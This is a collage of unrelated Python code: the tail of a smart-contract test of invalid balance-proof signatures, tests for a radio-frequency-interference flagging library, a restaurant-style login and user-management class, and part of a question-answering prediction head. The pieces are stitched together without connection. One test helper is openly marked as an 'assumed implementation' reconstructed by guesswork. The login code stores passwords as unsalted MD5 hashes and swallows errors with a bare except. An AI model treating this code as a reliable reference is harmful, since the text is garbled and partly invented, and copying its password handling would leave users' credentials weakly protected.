).transact({'from': B})
signature_invalid_channel_identifier = create_balance_proof_update_signature(
B,
channel_identifier[::-1], # invalid channel_identifier
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_channel_identifier,
).transact({'from': B})
signature_invalid_balance_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash[::-1], # invalid balance_hash
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_balance_hash,
).transact({'from': B})
signature_invalid_nonce = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
1, # invalid nonce
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_nonce,
).transact({'from': B})
signature_invalid_additional_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
b'\x00' * 32, # invalid additional_hash
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
            signature_invalid_additional_hash,
        ).transact({'from': B})
"""Tests of the xrfi module."""
import pytest
import itertools
import numpy as np
import yaml
from pathlib import Path
from pytest_cases import fixture_ref as fxref
from pytest_cases import parametrize
from edges_cal import xrfi
NFREQ = 1000
@pytest.fixture(scope="module")
def freq():
"""Default frequencies."""
return np.linspace(50, 150, NFREQ)
@pytest.fixture(scope="module")
def sky_pl_1d(freq):
return 1750 * (freq / 75.0) ** -2.55
@pytest.fixture(scope="module")
def sky_flat_1d():
return np.ones(NFREQ)
@pytest.fixture(scope="module")
def sky_linpoly_1d(freq):
p = np.poly1d([1750, 0, 3, -2, 7, 5][::-1])
f = np.linspace(-1, 1, len(freq))
return (freq / 75.0) ** -2.55 * p(f)
def thermal_noise(spec, scale=1, seed=None):
    if seed is not None:
np.random.seed(seed)
return np.random.normal(0, spec / scale)
@pytest.fixture(scope="module")
def rfi_regular_1d():
a = np.zeros(NFREQ)
a[50::50] = 1
return a
@pytest.fixture(scope="module")
def rfi_regular_leaky():
"""RFI that leaks into neighbouring bins"""
a = np.zeros(NFREQ)
a[50:-30:50] = 1
a[49:-30:50] = (
1.0 / 1000
) # needs to be smaller than 200 or else it will be flagged outright.
a[51:-30:50] = 1.0 / 1000
return a
@pytest.fixture(scope="module")
def rfi_random_1d():
a = np.zeros(NFREQ)
np.random.seed(12345)
a[np.random.randint(0, len(a), 40)] = 1
return a
@pytest.fixture(scope="module")
def rfi_null_1d():
return np.zeros(NFREQ)
def print_wrongness(wrong, std, info, noise, true_flags, sky, rfi):
if len(wrong) > 0:
print("Indices of WRONG flags:")
print(100 + wrong)
print("RFI false positive(0)/negative(1): ")
print(true_flags[wrong])
print("Corrupted sky at wrong flags: ")
print(sky[wrong])
print("Std. dev away from model at wrong flags: ")
        # sky differs from the model by noise + rfi (see make_sky), so report that here
        print((noise[wrong] + rfi[wrong]) / std[wrong])
print("Std. dev of noise away from model at wrong flags: ")
print(noise[wrong] / std[wrong])
print("Std dev of RFI away from model at wrong flags: ")
print(rfi[wrong] / std[wrong])
print("Measured Std Dev: ")
print(min(info.stds[-1]), max(info.stds[-1]))
print("Actual Std Dev (for uniform):", np.std(noise))
class TestFlaggedFilter:
def test_flagged_filter(self, sky_pl_1d, rfi_regular_1d):
flags = rfi_regular_1d.astype("bool")
in_data = sky_pl_1d.copy()
detrended = xrfi.flagged_filter(
in_data, size=5, flags=flags, interp_flagged=False
)
assert not np.any(np.isnan(detrended))
assert np.all(in_data == sky_pl_1d)
# Anything close to a flag will not be identical, as the
# median of an even number of items is the average of the middle two (and with
# a flag the total number of items is reduced by one).
assert np.all(detrended[flags] == sky_pl_1d[flags])
padded_flags = np.zeros_like(flags)
for index in np.where(flags)[0]:
padded_flags[index - 2 : index + 3] = True
padded_flags[index] = False
# Ensure everything away from flags is exactly the same.
assert np.all(detrended[~padded_flags] == sky_pl_1d[~padded_flags])
# An unflagged filter should be an identity operation.
unflagged = xrfi.flagged_filter(in_data, size=5)
assert np.all(unflagged == sky_pl_1d)
# But not quite, when mode = 'reflect':
unflagged = xrfi.flagged_filter(in_data, size=5, mode="reflect")
assert not np.all(unflagged[:2] == sky_pl_1d[:2])
# An unflagged filter with RFI should be very close to the original
sky = sky_pl_1d + 100000 * rfi_regular_1d
detrended = xrfi.flagged_filter(sky, size=5)
assert np.allclose(detrended, sky_pl_1d, rtol=1e-1)
class TestMedfilt:
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
    @pytest.mark.parametrize(
        "scale",
        [1000, 100],  # Note that realistic noise should be ~250.
    )
def test_1d_medfilt(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, significance = xrfi.xrfi_medfilt(
sky, max_iter=1, threshold=10, kf=5, use_meanfilt=True
)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, {}, noise, true_flags, sky, rfi)
assert len(wrong) == 0
class TestXRFIModel:
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model(self, sky_model, rfi_model, scale, freq):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(sky, freq=freq)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize("rfi_model", [fxref(rfi_regular_leaky)])
@pytest.mark.parametrize("scale", [1000, 100])
def test_watershed_strict(self, sky_model, rfi_model, scale, freq):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale, rfi_amp=200)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(
sky, freq=freq, watershed=1, threshold=5, min_threshold=4, max_iter=10
)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize("rfi_model", [fxref(rfi_regular_leaky)])
@pytest.mark.parametrize("scale", [1000, 100])
def test_watershed_relaxed(self, sky_model, rfi_model, scale, freq):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale, rfi_amp=500)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(sky, freq=freq, watershed=1, threshold=6)
# here we just assert no *missed* RFI
wrong = np.where(true_flags & ~flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_init_flags(self, sky_pl_1d, rfi_null_1d, freq):
# ensure init flags don't propagate through
flags, info = xrfi.xrfi_model(sky_pl_1d, freq=freq, init_flags=(90, 100))
assert not np.any(flags)
@parametrize("rfi_model", [fxref(rfi_random_1d), fxref(rfi_regular_1d)])
@pytest.mark.parametrize("std_estimator", ["medfilt", "std", "mad", "sliding_rms"])
def test_std_estimator(self, sky_flat_1d, rfi_model, std_estimator, freq):
if std_estimator == "sliding_rms" and rfi_model[50] == 0:
pytest.skip("sliding_rms doesn't work well for unrealistic random RFI")
sky, std, noise, rfi = make_sky(sky_flat_1d, rfi_model, scale=1000)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(sky, freq=freq, std_estimator=std_estimator)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_bad_std_estimator(self, sky_flat_1d, rfi_random_1d, freq):
sky, std, noise, rfi = make_sky(sky_flat_1d, rfi_random_1d, scale=1000)
with pytest.raises(ValueError):
flags, info = xrfi.xrfi_model(sky, freq=freq, std_estimator="bad_estimator")
class TestWatershed:
def test_watershed(self):
rfi = np.zeros((10, 10), dtype=bool)
out, _ = xrfi.xrfi_watershed(flags=rfi)
assert not np.any(out)
rfi = np.ones((10, 10), dtype=bool)
out, _ = xrfi.xrfi_watershed(flags=rfi)
assert np.all(out)
rfi = np.repeat([0, 1], 48).reshape((3, 32))
out, _ = xrfi.xrfi_watershed(flags=rfi, tol=0.2)
assert np.all(out)
def test_pass_weights(self):
out, _ = xrfi.xrfi_watershed(weights=np.zeros((10, 10)))
assert np.all(out)
def test_pass_no_flags(self):
with pytest.raises(ValueError):
xrfi.xrfi_watershed()
class TestModelSweep:
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
sky,
max_iter=10,
threshold=5,
use_median=True,
which_bin="last",
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] != flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep_all(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
sky, max_iter=10, which_bin="all", threshold=5, use_median=True
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] != flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep_watershed(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
sky, max_iter=10, which_bin="all", threshold=5, use_median=True, watershed=3
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] & ~flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_too_many_flags(self):
spec = np.ones(500)
flags = np.ones(500, dtype=bool)
weights = np.zeros(500)
# We're testing where not *all* are flagged, just enough to be more than the
# number of terms...
flags[::100] = False
weights[::100] = 1
flags_, info = xrfi.xrfi_model_sweep(spectrum=np.where(flags, np.nan, spec))
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, flags=flags)
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, weights=weights)
assert np.all(flags_)
assert not info
def test_all_flagged(self):
spec = np.ones(500)
flags = np.ones(500, dtype=bool)
weights = np.zeros(500)
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, flags=flags)
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, weights=weights)
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec * np.nan)
assert np.all(flags_)
assert not info
def test_no_data_error(self):
# to raise no data error, there must be no data for a whole window
spec = np.ones(500)
spec[50:150] = np.nan
flags, info = xrfi.xrfi_model_sweep(spec)
assert flags.shape == (500,)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep_median(self, sky_flat_1d, rfi_model, scale):
rfi = rfi_model.copy()
rfi[:100] = 0
sky, std, noise, rfi = make_sky(sky_flat_1d, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
sky, max_iter=10, threshold=5, use_median=False, which_bin="all"
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] != flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_watershed_last(self, sky_flat_1d):
with pytest.raises(ValueError):
xrfi.xrfi_model_sweep(sky_flat_1d, which_bin="last", watershed=4)
def test_giving_weights(self, sky_flat_1d):
sky, std, noise, rfi = make_sky(sky_flat_1d)
flags, info = xrfi.xrfi_model_sweep(
sky,
weights=np.ones_like(sky),
max_iter=10,
which_bin="all",
threshold=5,
use_median=True,
)
flags2, info2 = xrfi.xrfi_model_sweep(
sky, max_iter=10, which_bin="all", threshold=5, use_median=True
)
assert np.all(flags == flags2)
def make_sky(sky_model, rfi_model=np.zeros(NFREQ), scale=1000, rfi_amp=200):
    # NOTE: assumed implementation (the original body is not available here), reconstructed
    # from how (sky, std, noise, rfi) are used in the tests above; the seed and the RFI
    # scaling in units of the noise std are assumptions.
    std = sky_model / scale
    noise = thermal_noise(sky_model, scale=scale, seed=1010)
    rfi = rfi_model * rfi_amp * std  # RFI spikes expressed in units of the noise std
    sky = sky_model + noise + rfi
    return sky, std, noise, rfi
import hashlib
from mongoengine import Q
from mongoengine.connection import disconnect
import json
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql.expression import and_
from tools.DataBase.CodeGenerator import CodeGen
from tools.DataBase.Definition.Area import Area
from tools.DataBase.Definition.Contact import Contact
from tools.DataBase.Definition.Status import Status
from tools.DataBase.Definition.Type import Type
from tools.DataBase.Definition.User import User
from tools.DataBase.Definition.branch import Branch
from tools.DataBase.ODM.DataModelODM import SessionUser, UserInfo, UsertypeMenu, Module, waiterKey, UserArea, PreOrder, \
PreOrderTable, Group_module, group_module_asc, UserModule, cashbox, cashbox_open, UserCompany, rule_user
from tools.DataBase.Process import DBProcess
from tools.main import general
from tools.main.process import manContact
from tools.DataBase.Connect import conection
from sqlalchemy.sql import select
from tools.main.process.Accounts import Accounts
from tools.main.process.manContact import ManContact
from os import listdir
from os.path import isfile, join
class login:
def __init__(self):
self.connORM = conection().conORM()
self.status = 200
self.msg = None
self.type = "text/plain"
Session = sessionmaker(bind=self.connORM)
self.session = Session()
def UserRegistration(self, inputs):
"""The module, register users that
going to be added to the system."""
validation={"status":0}
if validation["status"] == 0:
#Crate the function that create the codes of the tables.
status_code = 12
userCode =0
if "contact" not in inputs:
inputs["code"]=ManContact().create({})["value"]["code"]
inputs["contact"]= ManContact().Handle(inputs)["value"]["code"]
inputs.pop("code", None)
if User.code.name not in inputs:
userCode = CodeGen().GenCode({"table": User.__tablename__})
#If the user type is 22, the information just will be save as an user.
userIns = User(username=inputs[User.username.name],
passwd=hashlib.md5(inputs[User.passwd.name].encode()).hexdigest(),
status=int(status_code), avatar="unknown.png",
usrtype=int(inputs[User.usrtype.name]),
code=userCode, contact=inputs[User.contact.name])
self.session.add(userIns)
else:
userCode = int(inputs[User.code.name])
if inputs["passwd"]!='':
dataInsert={User.username:inputs[User.username.name],
User.passwd:hashlib.md5(inputs[User.passwd.name].encode()).hexdigest(),
User.status:int(status_code), User.avatar:"unknown.png",
User.usrtype:int(inputs[User.usrtype.name]),
User.code:userCode, User.contact:inputs[User.contact.name]}
else:
dataInsert={User.username:inputs[User.username],
User.status:int(status_code), User.avatar:"unknown.png",
User.usrtype:int(inputs[User.usrtype.name]),
User.code:userCode, User.contact:inputs[User.contact.name]}
#If the user type is 22, the information just will be save as an user.
self.session.query(User).filter_by(code=int(inputs[User.code.name])).update\
(dataInsert)
self.session.commit()
self.session.close()
inputs["log_type"]=1
if "waiter_code" in inputs:
#Means that the user will be created a key for the waiter.
waiterKey.objects(user_code=userCode).update(set__status=12)
waiterKey(user_code=userCode, status=11, key=inputs["waiter_code"],
created_by=self.decLoginKey(inputs["key"]), created_date=general().date2julian()).save()
self.connORM.dispose()
self.session.close()
return {"status":200, "value":self.LoginSys(inputs)["value"], 'type':'application/json'}
else:
self.session.close()
self.connORM.dispose()
return {"status":500, "value":validation['msg'], 'type':'application/json'}
def confirmUsername(self, inputs):
        # Confirms whether the given username is already registered
user_info=self.session.query(User).filter_by(username=inputs[User.username.name]).first()
self.msg = {"response": 0}
if user_info!=None:
self.msg["response"]=1
self.msg[User.username.name]=inputs[User.username.name]
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": self.msg, 'type': 'application/json'}
def LoginWaiter(self, inputs):
waiterinfo = waiterKey.objects(key=inputs["waiter_code"], status=11).first()
if waiterinfo != None:
###First Close the session
self.closeAllSession(waiterinfo.user_code)
sessionUserID = CodeGen().GenCode({"table": "SessionUser"})
UserSess = SessionUser(userCode=waiterinfo.user_code, code=sessionUserID,
login=general().getJulian(), created_by=waiterinfo.user_code,
created_date=general().getJulian())
UserSess.save()
sessionID = str(UserSess.id)
profile = self.getProfile({"key": sessionID})["value"]
profile["key"] = sessionID
profile["orders"]=self.getOrdersByUser({"usercode":waiterinfo.user_code})["value"]
profile["modules"]=[]
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": profile, 'type': 'application/json'}
else:
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": {"error": 0}, 'type': 'application/json'}
def getOrdersByUser(self, inputs):
profile={0: []}
preorders = list(PreOrder.objects(status=11).values_list('code'))
for orders in preorders:
preorder_data = PreOrderTable.objects(preorder=orders).first()
if preorder_data != None:
# Attaching the order to the table.
profile[preorder_data.table_code] = [orders, preorder_data.tbl_name]
else:
# When there's no table, all the orders will be attach to the first area.
profile[0].append([orders])
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": profile, 'type': 'application/json'}
def checkPassword(self, inputs):
waiterinfo = waiterKey.objects(key=inputs["waiter_code"], status=11).first()
if waiterinfo != None:
###First Close the session
meta = {"db_alias": "default"}
profile = self.getProfile({"usercode": waiterinfo.user_code})["value"]
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": profile, 'type': 'application/json'}
else:
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": {"error": 0}, 'type': 'application/json'}
def create(self, inputs):
# This method will create an expense.
self.code = CodeGen().GenCode({"table": User.__tablename__, "column": User.code.name})
# Generating the code.
self.session.add(User(code=self.code, status=12))
# Saving
self.session.commit()
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": {User.code.name: self.code}, 'type': 'application/json'}
def Handle(self, inputs):
# This method will modify an expanse.
item = int(inputs[User.code.name])
        if User.passwd.name in inputs:  # only hash the password if one was provided
inputs[User.passwd.name] = hashlib.md5(inputs[User.passwd.name].
encode()).hexdigest()
storeDict = {}
for column in DBProcess(User.user_tbl).getColumnDefinition:
if column["name"] in inputs:
storeDict[column["expr"]] = DBProcess(User.user_tbl).parse(column, inputs[column["name"]])
self.session.query(User).filter_by(code=item).update(storeDict)
self.session.commit()
self.session.close()
if "waiter_code" in inputs:
if len(inputs["waiter_code"])>=4:
# Means that the user will be created a key for the waiter.
waiterKey.objects(user_code=item).update(set__status=12)
waiterCode= CodeGen().GenCode({"table": "waiterKey", "column": "code"})
waiterKey(code=waiterCode, user_code=item, status=11, key=inputs["waiter_code"],
created_by=self.decLoginKey(inputs["key"]), created_date=general().date2julian()).save()
return {"status": 200, "value": {User.code.name: item}, 'type': 'application/json'}
def Get(self, inputs):
# This method gets the data, from the db.
storeDict = []
main_query = self.session.query(User, Status.description, Type.tpname,
Contact.contact_name,Contact.lastname).\
filter(and_(Status.code == User.status, Type.code == User.usrtype)).\
filter(Contact.code==User.contact)
if User.username.name in inputs:
main_query = main_query.\
filter(User.username.like("%" + inputs[User.username.name] + "%"))
if User.code.name in inputs:
main_query = main_query.\
filter(User.code == int(inputs[User.code.name]))
if User.status.name in inputs:
main_query = main_query.\
filter(Status.code == int(inputs[User.status.name]))
if User.usrtype.name in inputs:
main_query = main_query. \
filter(Type.code == int(inputs[User.usrtype.name]))
# The next area is in charge to extract the information,
# from the store Dict and add it to the dataCol to be returned
storeDict=main_query
dataCol = []
for dataLst in storeDict:
dicStore = {"status_name": dataLst._asdict()[Status.description.name],
Type.tpname.name: dataLst._asdict()[Type.tpname.name]}
for key in DBProcess(User.user_tbl).getColumnDefinition:
dataDict = dataLst._asdict()[User.__name__].__dict__ # Getting the dictionary of the list.
colname = key["name"] # Getting the column name.
if colname in dataDict and colname != User.passwd.name: # Just if the column name is on the dictionary, add it to the dictStore.
dicStore[colname] = DBProcess(User.user_tbl).parse2publish(dataDict[colname])
for key in DBProcess(Contact.Contact_tbl).getColumnDefinition:
dataDict = dataLst._asdict() # Getting the dictionary of the list.
colname = key["name"] # Getting the column name.
if colname in dataDict: # Just if the column name is on the dictionary, add it to the dictStore.
dicStore[colname] = DBProcess(Contact.Contact_tbl).parse2publish(dataDict[colname])
dataCol.append(dicStore)
# Appending everything to be returned
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": dataCol, 'type': 'application/json'}
def closeAllSession(self, idUser):
meta = {"db_alias": "default"}
#This module will close all the sessions if there is one open.
SessionUser.objects(userCode=idUser).update(set__status=32)
def getProfile(self, inputs):
# Method that retrives the profile of a user.
userData = {}
meta = {"db_alias": "default"}
key = ""
if "key" in inputs:
userData["id"] = self.decLoginKey(inputs["key"])
elif "usercode" in inputs:
userData["id"] = int(inputs["usercode"])
getUserID = self.session.query(User.code, User.avatar, User.usrtype,
Branch.altpath, Contact.email, Contact.contact_name). \
filter(User.code == userData["id"]).\
filter(Contact.code == User.contact). \
filter(User.branch == Branch.code). \
first()
if getUserID != None:
userData["type"] = getUserID.usrtype
userData["cashbox"] = None # By default is None
cashbox_info = cashbox.objects(user_owner=getUserID.code).first()
if cashbox_info != None:
cashBoxcur = cashbox_open.objects.filter(
Q(cashbox=cashbox_info.code) & (Q(status=11) | Q(status=17))).first()
if cashBoxcur != None:
userData["cashbox"] = cashBoxcur.code
userData["code"] = getUserID.code
userData["avatar"] = getUserID.avatar
userData["email"] = getUserID.email
userData["copies"]=0
userData["altpath"]=getUserID.altpath
userData["companies"] = json.loads(UserCompany.objects(user_code=getUserID.code).to_json())
userData["areas"] =[]
for company in userData["companies"]:
data = self.session.query(Area).filter(Area.company == company["company"])
for piece in data:
del piece.__dict__['_sa_instance_state']
userData["areas"].append(piece.__dict__)
userData["paytypes"] = Accounts().getPayType({})["value"]
userData["billtypes"] = Accounts().getBillType({})["value"]
userData["name"] = getUserID.contact_name
userData["rules"]=json.loads(rule_user.objects(user_code=getUserID.code).to_json())
else:
userData["type"] = ""
userData["avatar"] = ""
userData["paytypes"] = []
userData["rules"]=[]
userData["billtypes"] = []
userData["email"] = ""
userData["name"] = ""
userData["altpath"]=""
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": userData, 'type': 'application/json'}
def LoginSys(self, inputs):
sessionID = 0
validation = {"status":0}
#When all the validations, are passed now the work.
###Close the session.
if validation["status"] > 0:
return {"status":500, "value":validation['msg'], 'type':'application/json'}
userData={}
#This means that login with the system.
getUserID = self.session.query(User.code, User.avatar, User.usrtype, Contact.email, Contact.contact_name).\
filter(User.username == inputs["username"]).filter(
User.passwd == hashlib.
md5(inputs["passwd"].encode()).hexdigest()).filter(Contact.code == User.contact).\
first()
if getUserID ==None:
return {"status":200, "value":{"error":0}, 'type':'application/json'}
###First Close the session
self.closeAllSession(getUserID.code)
meta = {"db_alias": "default"}
sessionUserID = CodeGen().GenCode({"table": "SessionUser"})
UserSess = SessionUser(userCode=getUserID.code, code=sessionUserID,
login=general().getJulian(), created_by=getUserID.code,
created_date=general().getJulian())
UserSess.save()
sessionID = str(UserSess.id)
profile=self.getProfile({"key": sessionID})
profile["key"] = sessionID
self.session.close()
self.connORM.dispose()
disconnect()
return {"status":200, "value":profile, 'type':'application/json'}
def LoginRoot(self, inputs):
#The login to verify if the owner of the account is this person.
sessionID = 0
validation = {"status":0}
#When all the validations, are passed now the work.
###Close the session.
if validation["status"] > 0:
return {"status":500, "value":validation['msg'],
'type':'application/json'}
userData={}
#This means that login with the system.
getUserID = self.session.query(User.code, User.avatar,
User.usrtype, Contact.email,
Contact.contact_name, User.owner).\
filter(User.username == inputs["username"]).filter(
User.passwd == hashlib.
md5(inputs["passwd"].encode()).hexdigest()).\
filter(Contact.code == User.contact).\
filter(User.owner == True).\
first()
if getUserID ==None:
return {"status":200, "value":{"error":0}, 'type':'application/json'}
###First Close the session
self.closeAllSession(getUserID.code)
meta = {"db_alias": "default"}
sessionUserID = CodeGen().GenCode({"table": "SessionUser"})
UserSess = SessionUser(userCode=getUserID.code, code=sessionUserID,
login=general().getJulian(), created_by=getUserID.code,
created_date=general().getJulian())
UserSess.save()
sessionID = str(UserSess.id)
profile=self.getProfile({"key": sessionID})
profile["key"] = sessionID
self.session.close()
self.connORM.dispose()
return {"status":200, "value":profile, 'type':'application/json'}
def decLoginKey(self, key):
meta = {"db_alias": "default"}
try:
UserSess = SessionUser.objects.get(id=key, logout=None)
return UserSess.userCode
except:
return None
def getUsersBy(self, inputs):
meta = {"db_alias": "default"}
userData = self.session.query(User.code, User.username,
Contact.contact_name, Contact.lastname, Contact.email, User.usrtype). \
filter(User.contact == Contact.code)
if "usertype" in inputs:
userData=userData.filter(User.usrtype==int(inputs["usertype"]))
elif "user" in inputs:
userData = userData.filter(User.code==int(inputs["user"]))
userLst =[]
for piece in userData:
lastname=""
if piece.lastname!=None:
lastname=piece.lastname
name=""
if piece.contact_name!=None:
name=piece.contact_name
userLst.append({"name":name+" "+lastname, "code":piece.code, "username":piece.username,
"email":piece.email,"type":piece.usrtype})
#userData.close()
self.session.close()
self.connORM.dispose()
return {"status":200, "value":userLst, 'type':'application/json'}
def getuserModule(self, inputs):
#Get the menu from a profile
meta = {"db_alias": "default"}
profile=self.getProfile(inputs)["value"]
dtype="text/html" # Data Type.
if "datatype" in inputs:
dtype = inputs["datatype"]
logits.
This matrix corresponds to a single sample (includes special tokens, question tokens, passage tokens).
This method always returns a list of len n_best_per_sample + 1 (it is comprised of the n_best_per_sample positive answers along with the one no_answer)
"""
# Initialize some variables
top_candidates: List[QACandidate] = []
n_candidates = sorted_candidates.shape[0]
start_idx_candidates = set()
end_idx_candidates = set()
start_matrix_softmax_start = F.softmax(start_matrix[:, 0], axis=-1)
end_matrix_softmax_end = F.softmax(end_matrix[0, :], axis=-1)
# Iterate over all candidates and break when we have all our n_best candidates
for candidate_idx in range(n_candidates):
if len(top_candidates) == self.n_best_per_sample:
break
# Retrieve candidate's indices
start_idx = sorted_candidates[candidate_idx, 0].item()
end_idx = sorted_candidates[candidate_idx, 1].item()
# Ignore no_answer scores which will be extracted later in this method
if start_idx == 0 and end_idx == 0:
continue
if self.duplicate_filtering > -1 and (
start_idx in start_idx_candidates or
end_idx in end_idx_candidates):
continue
score = start_end_matrix[start_idx, end_idx].item()
confidence = (start_matrix_softmax_start[start_idx].item() +
end_matrix_softmax_end[end_idx].item()) / 2
top_candidates.append(
QACandidate(
offset_answer_start=start_idx,
offset_answer_end=end_idx,
score=score,
answer_type="span",
offset_unit="token",
aggregation_level="passage",
passage_id=str(sample_idx),
confidence=confidence, ))
if self.duplicate_filtering > -1:
for i in range(0, self.duplicate_filtering + 1):
start_idx_candidates.add(start_idx + i)
start_idx_candidates.add(start_idx - i)
end_idx_candidates.add(end_idx + i)
end_idx_candidates.add(end_idx - i)
no_answer_score = start_end_matrix[0, 0].item()
no_answer_confidence = (start_matrix_softmax_start[0].item() +
end_matrix_softmax_end[0].item()) / 2
top_candidates.append(
QACandidate(
offset_answer_start=0,
offset_answer_end=0,
score=no_answer_score,
answer_type="no_answer",
offset_unit="token",
aggregation_level="passage",
passage_id=None,
confidence=no_answer_confidence, ))
return top_candidates
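    # Ranking sketch with made-up indices: if sorted_candidates starts with
    # [(0, 0), (17, 21), (18, 21), ...] and duplicate_filtering == 1, the (0, 0) row is
    # skipped here (no_answer is appended explicitly at the end), (17, 21) is kept, and
    # (18, 21) is dropped because 17 +/- 1 and 21 +/- 1 were added to the start/end
    # candidate sets; the returned list therefore holds n_best_per_sample spans plus
    # one no_answer candidate.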
def formatted_preds_wrapper(self, logits: paddle.Tensor, **kwargs):
"""
Format predictions for inference.
:param logits: Model logits.
:return: Predictions in the right format.
"""
preds_final = []
# This try catch is to deal with the fact that sometimes we collect preds before passing it to
# formatted_preds (see Inferencer._get_predictions_and_aggregate()) and sometimes we don't
# (see Inferencer._get_predictions())
try:
preds = kwargs["preds"]
temp = preds
preds_flat = [item for sublist in temp for item in sublist]
kwargs["preds"] = preds_flat
except KeyError:
kwargs["preds"] = None
logits_for_head = logits[0]
preds = self.formatted_preds(logits=logits_for_head, **kwargs)
# TODO This is very messy - we need better definition of what the output should look like
if type(preds) == list:
preds_final += preds
elif type(preds) == dict and "predictions" in preds:
